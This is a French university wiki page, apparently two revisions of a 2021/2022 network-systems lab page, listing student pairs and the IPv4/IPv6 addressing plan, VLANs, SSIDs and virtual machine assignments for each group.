{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]<br />
| Andrei Florea / Julien Delabre<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]<br />
| Robin Lasserye / Aviran Tetia <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]<br />
| Axel Guillaume<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]<br />
| Selim Raphael<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]<br />
| Helene Camille<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]<br />
| Boris JACQUOT / Louis WADBLED<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]<br />
| Johnny Gouvaert / Arthur Vercaemst<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]<br />
| Mel Theo<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]<br />
| Khalil Alvare<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]<br />
| Souleyman Enoch<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]<br />
| Clément<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]<br />
| <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]<br />
| <br />
|}<br />
<br />
=Plan d'adressage=<br />
<br />
{| class="wikitable"<br />
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM <br />
|- <br />
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg<br />
|-<br />
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B1::0/64 || 10.01.0.250 || 10.11.0.251 || 10.11.0.252 || 10.11.0.253 || Marguerite || Paixdieu<br />
|-<br />
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B2::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel<br />
|-<br />
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B3::0/64 || 10.03.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet<br />
|-<br />
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B4::0/64 || 10.04.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || Duff<br />
|-<br />
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B5::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose<br />
|-<br />
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B6::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke<br />
|- <br />
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B7::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || RinceCochon<br />
|-<br />
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B8::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B9::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || Panache<br />
|-<br />
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60BA::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || Corona<br />
|-<br />
| INTERCO || 531 || 192.168.222.72/29 || || || 192.168.222.74 || 192.168.222.75 || 192.168.222.76 || || &nbsp;<br />
|-<br />
| XEN || 42 || 193.48.57.160/28 || 2001:7A8:116E:60BF::0/64 || 193.48.57.190/28 2001:7A8:116E:60B0::F3/64 || 193.48.57.187/28 2001:7A8:116E:60B0::F0/64|| 193.48.57.188/28 2001:7A8:116E:60B0::F1/64 || 192.48.57.189/28 2001:7A8:116E:60B0::F2/64|| || &nbsp;<br />
|-<br />
|}<br />
<br />
Table du VLAN 42<br />
{| class="wikitable"<br />
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) <br />
|- <br />
| Andrei / Julien || 193.48.57.176/28 || &nbsp;<br />
|-<br />
| Robin / Aviran || 193.48.57.177/28 || &nbsp;<br />
|-<br />
| Axel / Guillaume || 193.48.57.178/28 || &nbsp;<br />
|-<br />
| Selim / Raphael || 193.48.57.179/28 || &nbsp;<br />
|-<br />
| Helene / Camille || 193.48.57.180/28 || &nbsp;<br />
|-<br />
| Boris / Louis || 193.48.57.181/28 || &nbsp;<br />
|-<br />
| Johnny / Arthur || 193.48.57.182/28 || &nbsp;<br />
|-<br />
| Mel / Theo || 193.48.57.183/28 || &nbsp;<br />
|-<br />
| Khalil / Alvare || 193.48.57.184/28 || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 193.48.57.185/28 || &nbsp;<br />
|-<br />
| Clement || 193.48.57.186/28 || &nbsp;<br />
|-<br />
|}<br />
<br />
<!--<br />
Note : <br />
<br />
'''à compléter '''<br />
{| class="wikitable"<br />
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2<br />
|-<br />
| ROUTEUR E304<br />
| <br />
| 193.48.57.187<br />
| <br />
| :: :F0<br />
| :: :F0<br />
| 10.NN.00.250<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR E306<br />
| <br />
| 193.48.57.188<br />
| <br />
| :: :F1<br />
| :: :F1<br />
| 10.NN.00.251<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR SR52<br />
| <br />
| 193.48.57.189<br />
| <br />
| :: :F2<br />
| :: :F2<br />
| 10.NN.00.252<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR FLOTTANTE<br />
| <br />
| 193.48.57.190<br />
| <br />
| :: :F3<br />
| :: :F3<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO 531 INTERCO-SA<br />
| <br />
| 192.168.222.40/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E304<br />
| <br />
| 192.168.222.41/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E306<br />
| <br />
| 192.168.222.42/29<br />
| <br />
| fe80::/10 ::2<br />
| fe80::/10 ::2<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO SR53<br />
| <br />
| 192.168.222.43/29<br />
| <br />
| fe80::/10 ::3<br />
| fe80::/10 ::3<br />
| <br />
| <br />
| <br />
| <br />
|}<br />
!--><br />
<br />
<br />
* Plan d'adressage IPv4 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
|<br />
|}<br />
<br />
* Plan d'adressage IPv6 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
<br />
|}<br />
<br />
Faudra mettre en forme ça, signé Boris<br />
Vlan 1 = Vlan d'administration<br />
10.1.0.1/24 = router e306<br />
10.1.0.2/24 = router e304<br />
10.1.0.3/24 = ap e306<br />
10.1.0.4/24 = ap e304<br />
<br />
=Architecture réseau=</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&diff=56722TP sysres IMA5sc 2021/20222021-11-29T17:52:39Z<p>Bjacquot : /* Plan d'adressage */</p>
<hr />
<div>== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]<br />
| Andrei Florea / Julien Delabre<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]<br />
| Robin Lasserye / Aviran Tetia <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]<br />
| Axel Guillaume<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]<br />
| Selim Raphael<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]<br />
| Helene Camille<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]<br />
| Boris JACQUOT / Louis WADBLED<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]<br />
| Johnny Gouvaert / Arthur Vercaemst<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]<br />
| Mel Theo<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]<br />
| Khalil Alvare<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]<br />
| Souleyman Enoch<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]<br />
| Clément<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]<br />
| <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]<br />
| <br />
|}<br />
<br />
=Plan d'adressage=<br />
<br />
{| class="wikitable"<br />
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM <br />
|- <br />
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg<br />
|-<br />
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B1::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu<br />
|-<br />
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B2::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel<br />
|-<br />
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B3::0/64 || 10.03.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet<br />
|-<br />
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B4::0/64 || 10.04.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || Duff<br />
|-<br />
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B5::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose<br />
|-<br />
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B6::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke<br />
|- <br />
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B7::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || RinceCochon<br />
|-<br />
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B8::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B9::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || Panache<br />
|-<br />
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60BA::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || Corona<br />
|-<br />
| INTERCO || 531 || 192.168.222.72/29 || || || 192.168.222.74 || 192.168.222.75 || 192.168.222.76 || || &nbsp;<br />
|-<br />
| XEN || 42 || 193.48.57.160/28 || 2001:7A8:116E:60BF::0/64 || 193.48.57.190/28 2001:7A8:116E:60B0::F3/64 || 193.48.57.187/28 2001:7A8:116E:60B0::F0/64|| 193.48.57.188/28 2001:7A8:116E:60B0::F1/64 || 192.48.57.189/28 2001:7A8:116E:60B0::F2/64|| || &nbsp;<br />
|-<br />
|}<br />
<br />
Table du VLAN 42<br />
{| class="wikitable"<br />
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) <br />
|- <br />
| Andrei / Julien || 193.48.57.176/28 || &nbsp;<br />
|-<br />
| Robin / Aviran || 193.48.57.177/28 || &nbsp;<br />
|-<br />
| Axel / Guillaume || 193.48.57.178/28 || &nbsp;<br />
|-<br />
| Selim / Raphael || 193.48.57.179/28 || &nbsp;<br />
|-<br />
| Helene / Camille || 193.48.57.180/28 || &nbsp;<br />
|-<br />
| Boris / Louis || 193.48.57.181/28 || &nbsp;<br />
|-<br />
| Johnny / Arthur || 193.48.57.182/28 || &nbsp;<br />
|-<br />
| Mel / Theo || 193.48.57.183/28 || &nbsp;<br />
|-<br />
| Khalil / Alvare || 193.48.57.184/28 || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 193.48.57.185/28 || &nbsp;<br />
|-<br />
| Clement || 193.48.57.186/28 || &nbsp;<br />
|-<br />
|}<br />
<br />
<!--<br />
Note : <br />
<br />
'''à compléter '''<br />
{| class="wikitable"<br />
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2<br />
|-<br />
| ROUTEUR E304<br />
| <br />
| 193.48.57.187<br />
| <br />
| :: :F0<br />
| :: :F0<br />
| 10.NN.00.250<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR E306<br />
| <br />
| 193.48.57.188<br />
| <br />
| :: :F1<br />
| :: :F1<br />
| 10.NN.00.251<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR SR52<br />
| <br />
| 193.48.57.189<br />
| <br />
| :: :F2<br />
| :: :F2<br />
| 10.NN.00.252<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR FLOTTANTE<br />
| <br />
| 193.48.57.190<br />
| <br />
| :: :F3<br />
| :: :F3<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO 531 INTERCO-SA<br />
| <br />
| 192.168.222.40/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E304<br />
| <br />
| 192.168.222.41/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E306<br />
| <br />
| 192.168.222.42/29<br />
| <br />
| fe80::/10 ::2<br />
| fe80::/10 ::2<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO SR53<br />
| <br />
| 192.168.222.43/29<br />
| <br />
| fe80::/10 ::3<br />
| fe80::/10 ::3<br />
| <br />
| <br />
| <br />
| <br />
|}<br />
!--><br />
<br />
<br />
* Plan d'adressage IPv4 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
|<br />
|}<br />
<br />
* Plan d'adressage IPv6 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
<br />
|}<br />
<br />
=Architecture réseau=</div>Bjacquot